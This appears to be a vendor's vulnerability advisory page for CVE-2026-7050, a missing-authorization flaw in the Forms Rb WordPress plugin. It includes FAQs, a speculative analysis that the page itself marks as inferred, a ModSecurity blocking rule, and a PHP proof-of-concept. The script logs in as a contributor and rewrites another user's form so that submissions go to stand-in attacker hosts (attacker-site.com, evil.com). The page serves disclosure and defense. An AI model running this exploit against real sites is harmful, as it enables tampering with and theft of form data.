What is CVE-2026-7050?

CVE-2026-7050 is a security vulnerability in the Forms Rb plugin for WordPress, affecting versions up to and including 1.1.9. It allows authenticated users with contributor-level access or higher to bypass authorization checks and modify or delete form submissions and configurations belonging to other users.

How does the vulnerability work?

The vulnerability arises from the plugin’s failure to properly verify user permissions before allowing actions on forms identified by the ‘form_id’ parameter. An attacker can craft requests to the plugin’s AJAX endpoints, manipulating the ‘form_id’ to access forms they do not own.

Who is affected by CVE-2026-7050?

Any WordPress site using the Forms Rb plugin version 1.1.9 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to access and modify forms.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Forms Rb plugin installed. If it is version 1.1.9 or earlier, your site is at risk. Additionally, review user roles and permissions to identify potential exploiters.

What is the severity level of this vulnerability?

CVE-2026-7050 has a CVSS score of 4.3, categorized as medium severity. This indicates that while authentication is required for exploitation, the potential for unauthorized data manipulation poses a significant risk.

What are the practical risks of this vulnerability?

Successful exploitation allows an attacker to read sensitive data, modify form configurations, and delete submissions. This can lead to data breaches, loss of data integrity, and disruption of business processes that rely on form submissions.

How can I mitigate the issue?

To mitigate the vulnerability, update the Forms Rb plugin to the latest version where the issue is fixed. Additionally, implement proper authorization checks in the plugin to ensure users can only modify forms they own.

What should I do if I cannot immediately update the plugin?

If an immediate update is not possible, consider disabling the Forms Rb plugin temporarily or restricting access to it for users with contributor-level permissions until the vulnerability is resolved.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated contributor can send a crafted request to modify another user’s form configuration. It highlights the lack of authorization checks on the ‘form_id’ parameter, allowing unauthorized access.

What are the implications for user data security?

The vulnerability can expose sensitive user data, including personally identifiable information (PII) from form submissions. This could lead to privacy violations and regulatory compliance issues for affected organizations.

Are there any known exploits in the wild?

As of now, there are no public reports of active exploitation of CVE-2026-7050. However, the nature of the vulnerability makes it a potential target for attackers, emphasizing the need for prompt remediation.

What is the recommended action for site administrators?

Site administrators should prioritize updating the Forms Rb plugin to the latest version. Regularly review user roles and permissions, and implement security best practices to minimize the risk of similar vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-7050: Forms Rb <= 1.1.9 – Missing Authorization to Authenticated (Contributor+) Arbitrary Modification via 'form_id' Parameter (forms-rb)

CVE ID CVE-2026-7050

Plugin forms-rb

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.1.9

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7050 (metadata-based): This vulnerability affects the Forms Rb plugin for WordPress, version 1.1.9 and earlier. It allows authenticated attackers with contributor-level access or higher to bypass authorization checks and read, modify, or delete form submissions and configurations belonging to any user’s forms. The CVSS score is 4.3 (medium), reflecting the requirement for authentication but the potential for lateral data manipulation.

Root Cause: The CWE classification (862 Missing Authorization) and the description indicate the plugin fails to verify that the current user has proper capabilities (e.g., ownership or edit_posts) before permitting actions on form submissions identified by the ‘form_id’ parameter. Atomic Edge analysis infers that the vulnerable code likely retrieves the ‘form_id’ from request parameters (via GET or POST) and uses it directly in database queries or update operations without checking if the authenticated user owns that form. This is a classic insecure direct object reference (IDOR) pattern within WordPress plugin AJAX handlers or admin pages.

Exploitation: An attacker with contributor-level credentials crafts requests to the plugin’s AJAX endpoints, typically reachable via /wp-admin/admin-ajax.php with an action parameter like ‘forms_rb_update_form’ or ‘forms_rb_get_submissions’. The attacker sets the ‘form_id’ parameter to an integer representing another user’s form. For example, a POST to /wp-admin/admin-ajax.php with action=forms_rb_save and form_id=5 would modify the configuration of form ID 5, even if the attacker does not own it. The attacker can also delete submissions by sending form_id and submission_id values. No nonce verification or capability check is performed on the target form.

Remediation: The fix requires implementing proper authorization checks before any action that uses the ‘form_id’ parameter. The plugin must verify that the current user has the required capability (e.g., ‘edit_posts’ or a custom capability) and that they own the form or have specific permissions to modify it. A check like ‘current_user_can(‘edit_post’, $form_id)’ or verifying the form’s author ID against the current user ID would prevent unauthorized access. The patched plugin should also validate that the user can read or delete submissions belonging to that form.

Impact: Successful exploitation allows authenticated contributors to read sensitive form submission data (potentially including PII), modify form configurations (redirect URLs, email recipients, validation rules), and delete submission records. This can lead to data breaches, loss of data integrity, and manipulation of business workflows relying on form submissions. The attacker cannot escalate privileges to administrator but can compromise other users’ data and form functionality.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-7050 (metadata-based)
# Blocks unauthorized modification of form configuration by contributor-level attackers
# Targets AJAX endpoints with missing authorization checks on 'form_id'
# This is a virtual patch based on inferred vulnerability class
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20267050,phase:2,deny,status:403,chain,msg:'CVE-2026-7050 - Forms Rb Missing Authorization via form_id',severity:'CRITICAL',tag:'CVE-2026-7050',tag:'wordpress',tag:'plugin-forms-rb'"
  SecRule ARGS_POST:action "@pm forms_rb_save forms_rb_update forms_rb_delete forms_rb_get_submissions" "chain"
    SecRule ARGS_POST:form_id "@rx ^[0-9]+$" "chain"
      SecRule ARGS_POST:form_redirect|ARGS_POST:form_email_to|ARGS_POST:form_title "@rx ." "t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7050 - Forms Rb <= 1.1.9 - Missing Authorization to Authenticated (Contributor+) Arbitrary Modification via 'form_id' Parameter

/**
 * This proof-of-concept demonstrates how an authenticated contributor can modify
 * another user's form configuration by exploiting the missing authorization check
 * on the 'form_id' parameter. The script assumes the Forms Rb plugin uses
 * an AJAX endpoint with action 'forms_rb_save' and accepts form_id, form_title,
 * form_fields as POST parameters. Adjust the endpoint parameters based on actual
 * plugin code if different.
 */

$target_url = 'https://example.com'; // Replace with the target WordPress site URL
$username = 'contributor'; // Valid contributor credentials
$password = 'password123';

// Step 1: Authenticate via wp-login
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    fwrite(STDERR, "Authentication failed. Check credentials or login URL.n");
    exit(1);
}
echo "[+] Authenticated as $usernamen";

// Step 2: Exploit missing authorization by modifying a form we do not own
// The target form ID is 5 (arbitrary, must be a valid form ID belonging to another user)
$target_form_id = 5;

// Determine the AJAX action from plugin slug convention. Commonly 'forms_rb_save' or 'forms_rb_update'
// We try both. Adjust if different.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Payload for modification
$payload = array(
    'action' => 'forms_rb_save',
    'form_id' => $target_form_id,
    'form_title' => 'Modified Form Title - Compromised',
    'form_fields' => json_encode(array(
        array('label' => 'Name', 'type' => 'text'),
        array('label' => 'Email', 'type' => 'email')
    )),
    'form_redirect' => 'https://attacker-site.com/steal-data',
    'form_email_to' => 'attacker@evil.com'
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);

// Check response for success (plugin may return JSON with 'success' or a redirect)
if (strpos($response, '"success":true') !== false || strpos($response, 'Form saved') !== false) {
    echo "[+] Exploit succeeded. Form ID $target_form_id has been modified.n";
} else {
    echo "[!] Exploit may have failed. Response:n$responsen";
    // Try alternative action name
    $payload['action'] = 'forms_rb_update';
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
    $response2 = curl_exec($ch);
    if (strpos($response2, '"success":true') !== false || strpos($response2, 'Form saved') !== false) {
        echo "[+] Exploit succeeded with alternative action. Form ID $target_form_id modified.n";
    } else {
        echo "[!] Exploit failed with both action names. Check if the plugin uses a different AJAX hook or nonce requirement.n";
    }
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-7050?
Overview of the vulnerability
CVE-2026-7050 is a security vulnerability in the Forms Rb plugin for WordPress, affecting versions up to and including 1.1.9. It allows authenticated users with contributor-level access or higher to bypass authorization checks and modify or delete form submissions and configurations belonging to other users.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to properly verify user permissions before allowing actions on forms identified by the ‘form_id’ parameter. An attacker can craft requests to the plugin’s AJAX endpoints, manipulating the ‘form_id’ to access forms they do not own.
Who is affected by CVE-2026-7050?
Identifying impacted users
Any WordPress site using the Forms Rb plugin version 1.1.9 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to access and modify forms.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Forms Rb plugin installed. If it is version 1.1.9 or earlier, your site is at risk. Additionally, review user roles and permissions to identify potential exploiters.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-7050 has a CVSS score of 4.3, categorized as medium severity. This indicates that while authentication is required for exploitation, the potential for unauthorized data manipulation poses a significant risk.
What are the practical risks of this vulnerability?
Consequences of exploitation
Successful exploitation allows an attacker to read sensitive data, modify form configurations, and delete submissions. This can lead to data breaches, loss of data integrity, and disruption of business processes that rely on form submissions.
How can I mitigate the issue?
Recommended remediation steps
To mitigate the vulnerability, update the Forms Rb plugin to the latest version where the issue is fixed. Additionally, implement proper authorization checks in the plugin to ensure users can only modify forms they own.
What should I do if I cannot immediately update the plugin?
Temporary measures to reduce risk
If an immediate update is not possible, consider disabling the Forms Rb plugin temporarily or restricting access to it for users with contributor-level permissions until the vulnerability is resolved.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploit example
The proof of concept illustrates how an authenticated contributor can send a crafted request to modify another user’s form configuration. It highlights the lack of authorization checks on the ‘form_id’ parameter, allowing unauthorized access.
What are the implications for user data security?
Impact on sensitive information
The vulnerability can expose sensitive user data, including personally identifiable information (PII) from form submissions. This could lead to privacy violations and regulatory compliance issues for affected organizations.
Are there any known exploits in the wild?
Current state of exploitation
As of now, there are no public reports of active exploitation of CVE-2026-7050. However, the nature of the vulnerability makes it a potential target for attackers, emphasizing the need for prompt remediation.
What is the recommended action for site administrators?
Best practices for security
Site administrators should prioritize updating the Forms Rb plugin to the latest version. Regularly review user roles and permissions, and implement security best practices to minimize the risk of similar vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations